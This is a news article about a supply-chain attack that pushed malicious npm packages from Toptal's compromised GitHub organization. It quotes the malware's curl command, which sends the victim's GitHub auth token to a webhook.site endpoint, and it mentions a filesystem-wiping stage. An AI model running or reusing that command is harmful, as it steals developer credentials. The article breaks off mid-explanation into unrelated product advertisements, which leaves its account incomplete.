Supply-chain attacks on open source software are getting out of hand

25 July 2025

Upgrade to Custom Cursor Pro for exclusive features!

Attacks affected packages, including one with ~2.8 million weekly downloads.

It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users.

The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users before the supply-chain attack was detected. The packages have since been removed. This was the third supply-chain attack Socket has observed on npm in the past week.

Poisoning the well

The hackers behind the attack pulled it off by first compromising Toptal’s GitHub Organization and from there using that access to publish the malicious packages on npm.

Researchers still don’t know precisely how the attack worked and what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. Socket said in an email that the npm publishing “likely happed through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing the publishing of npm packages once a GitHub organization is hijacked.

“The attack could have originated from compromised GitHub access that enabled both repository modifications and npm publishing, or from separate compromise vectors that affected both platforms independently,” Socket researchers wrote Wednesday. “Without additional forensic evidence, determining the precise sequence and relationship between these events remains challenging.”

Toptal has yet to say how its account was compromised. Company representatives didn’t respond to an email asking.

The malicious payload inserted into the packages had two stages. First, the code extracted the target's GitHub authentication token and sent it to an attacker-controlled endpoint at the domain webhook.site. These tokens gave the attackers persistent access to the target’s GitHub repositories, which could in turn be used in further supply-chain attacks.

The command invoking the extraction was:

curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b

After the credentials were exfiltrated, the payload tried to delete the entire filesystem of the target’s device. The script contained commands for destroying file systems on either Unix-like or Windows operating systems. The Unix command used was:

Discover our latest cursor collections and enhance your browsing today!
Advertisement: Try Custom Cursor Pro now!

Our Products

Custom Cursor - Mouse Cursor

Custom Cursor - Mouse Cursor

Rediscover the classic pointer - Mouse Cursor redefines simplicity with a selection of minimalist, high-contrast cursors optimized for every task.

View Product
BridgeMaster - Stick Hero Arcade Game

BridgeMaster - Stick Hero Arcade Game

Extend session lengths with BridgeMaster - a physics-driven arcade game where precision and timing unlock new levels of user engagement.

View Product
Catch the Cat - Reflex Challenge

Catch the Cat - Reflex Challenge

Drive repeat sessions with Catch the Cat - a fast-paced browser game that tests reflexes and strategic thinking in bite-sized play periods.

View Product
Custom Cursor Pro - Custom Cursor

Custom Cursor Pro - Custom Cursor

Elevate your Chrome experience with Custom Cursor Pro: a premium suite of handcrafted cursors engineered for performance, style, and seamless integration.

View Product
Cursor Cat - Animated Pointer Companion

Cursor Cat - Animated Pointer Companion

Delight users with Cursor Cat - a playful Chrome extension that adds a charming feline sidekick to every cursor move, boosting UX and shareability.

View Product
Money Rain - Visual Currency Extension

Money Rain - Visual Currency Extension

Capture attention with Money Rain - a Chrome extension that showers your screen in dynamic money graphics, perfect for viral sharing and brand visibility.

View Product
Custom Cursor - Texture Cursors

Custom Cursor - Texture Cursors

Experience tactile depth in the digital realm - Texture Cursors offers a curated set of lifelike pointer textures, elevating both clarity and creativity.

View Product
Cookie Clicker - Idle Browser Simulation

Cookie Clicker - Idle Browser Simulation

Engage millions in addictive baking fun - Cookie Clicker ramps up user retention with layered upgrades and strategic progression in an idle format.

View Product
Custom Cursor Trail - Custom Cursor Helper

Custom Cursor Trail - Custom Cursor Helper

Leave a lasting impression - Cursor Trail paints your path in luminous strokes, marrying dynamic motion with elegant design for every movement.

View Product
Custom Cursor Changer

Custom Cursor Changer

Inject personality into your pointer - Custom Cursor Changer lets you switch between dozens of vibrant designs in a single click, boosting engagement and fun.

View Product
Custom Cursor Trail - Interactive Effects

Custom Cursor Trail - Interactive Effects

Stand out with Custom Cursor Trail - a Chrome extension that traces your pointer in vivid effects to captivate visitors and boost brand recall.

View Product
Cursor Trails - Custom Cursor Trails

Cursor Trails - Custom Cursor Trails

Enrich each click with graceful motion - Cursor Trails offers a refined collection of animated effects to elevate both style and usability.

View Product
Custom Cursor App - Custom Cursor

Custom Cursor App - Custom Cursor

Discover a versatile cursor toolkit - Custom Cursor App delivers an expansive library of high-resolution pointers that blend flawless aesthetics with lightning-fast performance.

View Product
Minesweeper for Chrome - Logic Puzzle

Minesweeper for Chrome - Logic Puzzle

Revitalize a classic with Minesweeper for Chrome - an engaging logic puzzle that enhances site interaction and encourages multiple playthroughs.

View Product
PiggyBank Money Clicker - Idle Cash Game

PiggyBank Money Clicker - Idle Cash Game

Boost engagement with PiggyBank Money Clicker - a browser idle game where every click yields virtual cash, driving session length and repeat visits.

View Product
Cursor Helper - Custom Cursors

Cursor Helper - Custom Cursors

Maximize productivity with Cursor Helper: a refined extension that not only customizes your pointer’s look but streamlines your daily workflow with intuitive options.

View Product
Pawsome Browser Kitties - Cursor Animation

Pawsome Browser Kitties - Cursor Animation

Increase dwell time with Pawsome Kitties - animated kitten avatars that follow your pointer, enhancing site stickiness and user delight.

View Product
Cursor Space for Google Chrome

Cursor Space for Google Chrome

Transform your browser into a cosmic playground - Cursor Space introduces galaxy-inspired pointers that add immersive flair without sacrificing speed or usability.

View Product